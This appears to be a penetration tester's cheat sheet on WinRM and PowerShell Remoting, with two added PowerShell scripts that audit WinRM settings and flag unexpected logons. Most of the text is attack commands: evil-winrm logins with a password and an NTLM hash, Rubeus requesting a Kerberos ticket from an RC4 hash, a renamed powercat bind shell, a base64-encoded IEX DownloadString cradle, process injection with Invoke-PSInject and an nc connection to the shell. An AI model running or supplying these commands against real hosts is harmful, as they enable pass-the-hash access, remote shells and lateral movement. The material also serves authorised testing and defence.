WinRM / PSRemoting

Windows Remote Management / PowerShell Remoting

Enable WinRM

Using PowerShell (takes about a minute to apply):

PS > Enable-PSRemoting -Force
PS > Set-Item wsman:\localhost\client\trustedhosts * -Force
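The two commands above turn remoting on and open the client's TrustedHosts to every host. As an added defender's check that is not part of the original notes, the script below audits exactly those settings on a host: listener transport and bind address, the client TrustedHosts value, the service-side AllowUnencrypted and Basic-auth switches, and who sits in Remote Management Users. It assumes it runs elevated on the host being audited, since the WSMan: drive needs administrator rights.

```powershell
# Added example, not from the original notes: audits the WinRM settings that the
# "Enable WinRM" steps change. Run elevated on the host being audited.
function Test-WinRMExposure {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Listeners: an HTTP listener bound to Address=* accepts sessions on 5985
    #    without TLS (the payload is still Kerberos/NTLM-encrypted by default).
    foreach ($listener in Get-ChildItem WSMan:\localhost\Listener -ErrorAction SilentlyContinue) {
        $props     = Get-ChildItem $listener.PSPath
        $transport = ($props | Where-Object Name -eq 'Transport').Value
        $address   = ($props | Where-Object Name -eq 'Address').Value
        $port      = ($props | Where-Object Name -eq 'Port').Value
        if ($transport -eq 'HTTP' -and $address -eq '*') {
            $findings.Add("HTTP listener on all addresses (port $port); prefer an HTTPS listener or restrict Address")
        }
    }

    # 2. Client TrustedHosts: '*' lets this host connect to any WinRM endpoint
    #    over NTLM/Basic with no server identity check.
    $trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
    if ($trusted -eq '*') {
        $findings.Add("Client TrustedHosts is '*'; scope it to named hosts or rely on Kerberos")
    }

    # 3. Service-side switches that weaken transport or authentication.
    if ((Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value -eq 'true') {
        $findings.Add("Service AllowUnencrypted=true; messages may be sent without encryption")
    }
    if ((Get-Item WSMan:\localhost\Service\Auth\Basic).Value -eq 'true') {
        $findings.Add("Service Basic auth enabled; credentials are protected only by the transport")
    }

    # 4. Accounts that may open a remote shell without being local admins.
    $rmu = @()
    try {
        $rmu = Get-LocalGroupMember -Group 'Remote Management Users' -ErrorAction Stop |
               Select-Object -ExpandProperty Name
    } catch { }

    [pscustomobject]@{
        ComputerName          = $env:COMPUTERNAME
        TrustedHosts          = $trusted
        RemoteManagementUsers = $rmu
        Findings              = $findings.ToArray()
    }
}

Test-WinRMExposure | Format-List
```

An empty Findings array is the expected result on a host that keeps the defaults (HTTPS or address-restricted listener, TrustedHosts empty, Basic off, AllowUnencrypted off).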

Remotely with CME:


From Windows

PS > winrm get winrm/config
PS > winrm set winrm/config/client '@{TrustedHosts="*"}'
PS > $sess = New-PSSession -ComputerName -Credential $cred
PS > Enter-PSSession -Session $sess
PS > Copy-Item .\file.txt -Destination "C:\users\administrator\music\" -ToSession $sess

From Linux


Basic syntax:

$ evil-winrm -u '[MEGACORP\]snovvcrash' -p 'Passw0rd!' -i -s `pwd` -e `pwd`
$ evil-winrm -u '[MEGACORP\]snovvcrash' -H fc525c9683e8fe067095ba2ddc971889 -i -s `pwd` -e `pwd`

Always use the full, domain-qualified username when authenticating as a domain user. If two users share the same name (a local user and a domain user, say WORKGROUP\Administrator and MEGACORP\Administrator) and you try to authenticate as the domain admin without the domain prefix, authentication will fail.
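On the server side, an evil-winrm or Enter-PSSession login lands in the WinRM operational log. As an added detection example that is not part of the original notes, the function below pulls recent shell creations and authentications from that log and flags users outside an allow-list. Assumptions: the Microsoft-Windows-WinRM/Operational log is enabled (the default on current Windows), event 91 records "Creating WSMan shell on server" and event 169 records the authenticated user and mechanism; confirm those IDs against your own logs, and the allow-list account MEGACORP\svc_mgmt is a constructed value.

```powershell
# Added example, not from the original notes: lists recent WinRM shell creations
# (event 91) and authentications (event 169) on this host. Event IDs are an
# assumption to verify against your environment.
function Get-WinRMSessionEvents {
    param(
        [int]$Hours = 24,
        [string[]]$ExpectedUsers = @()   # accounts allowed to use WinRM on this host
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-WinRM/Operational'
        Id        = 91, 169
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $firstLine = ($_.Message -split "`r?`n")[0]
        # Event 169 text reads like "User DOMAIN\name authenticated successfully using X authentication"
        $user = if ($_.Id -eq 169 -and $firstLine -match 'User (\S+) authenticated') { $Matches[1] } else { $null }
        [pscustomobject]@{
            Time       = $_.TimeCreated
            Id         = $_.Id
            User       = $user
            Unexpected = [bool]($user -and $ExpectedUsers.Count -gt 0 -and $user -notin $ExpectedUsers)
            Message    = $firstLine
        }
    }
}

# Usage (constructed allow-list): show the last 24h and mark logons from accounts not on it
Get-WinRMSessionEvents -ExpectedUsers 'MEGACORP\svc_mgmt' | Sort-Object Time | Format-Table -AutoSize
```

Because event 169 carries the account in the form the client supplied, a domain logon shows up as MEGACORP\user while a local one shows the machine name, which is also a quick way to see which of two same-named accounts actually authenticated.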

Execute a .NET binary:

*Evil-WinRM* PS > Invoke-Binary Rubeus.exe "asktgt, /domain:megacorp.local, /user:snovvcrash, /rc4:fc525c9683e8fe067095ba2ddc971889, /nowrap"

Spawn interactive bind shell with powercat.ps1 and Invoke-PSInject.ps1:

$ sed -i s/powercat/pwcat/g pwcat.ps1
$ echo 'powercat -l -p 1337 -e cmd.exe' >> pwcat.ps1
$ echo 'IEX(New-Object Net.WebClient).DownloadString('''')' | iconv -t UTF-16LE | base64 -w0
*Evil-WinRM* PS > Get-Process
*Evil-WinRM* PS > Invoke-PSInject.ps1
*Evil-WinRM* PS > Invoke-PSInject -ProcId <PID> -PoshCode <BASE64_CMD>
$ rlwrap nc 1337


$ pwsh
PS > $sess = New-PSSession -ComputerName -Credential $cred -Authentication Negotiate
PS > Enter-PSSession -Session $sess
